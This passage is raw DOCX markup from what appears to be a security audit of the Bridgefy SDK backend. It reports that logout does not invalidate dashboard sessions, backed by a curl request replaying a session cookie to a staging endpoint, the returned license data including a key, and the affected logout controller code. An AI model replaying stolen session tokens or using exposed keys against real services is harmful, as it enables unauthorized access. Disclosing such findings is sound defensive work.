          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>logged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> out</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>endpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>still</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>replies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(i.e.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>despite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>being</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>out)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cURL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>logout):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Accept:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>application/json,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>text/plain,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>*/*'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Cookie: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bfSDKSession=eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.ey[...]'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'https://staging.sdk.bridgefy.services/bridgefy/dashboard/my-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>licenses'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="36"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"response"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:[{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"6398c89972ee224bd5f0f970"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Monitor"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"key"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"eee06afe-19eb-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4ed 9-a907-c38f2167c001"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bundleIds"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.bridgefy.BridgefyNewDevelopment:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy. main.dev:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.bridgefy.BridgefyNewStaging:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"com.bridgefy.BridgefyNew:1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridge fy.main.qa:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.main:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.template.dev:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.main.stagi ng:0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"users"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:50,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"createdAt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"2022-12-13T18:46:49.859Z"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="82"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cause</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-backend/src/api/dashboard/auth/ctrl.auth-dash.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@httpDelete(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/logout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="1115" w:right="4802" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>...checkSchema(schemaLogoutDash)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, COMMON.midParameters,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>COMMON.midTokenJwtDash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>public </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>async </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>logoutDash(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@request() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>req: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Request,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@requestBody() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>params: </w:t>
      </w:r>
      <w:r>
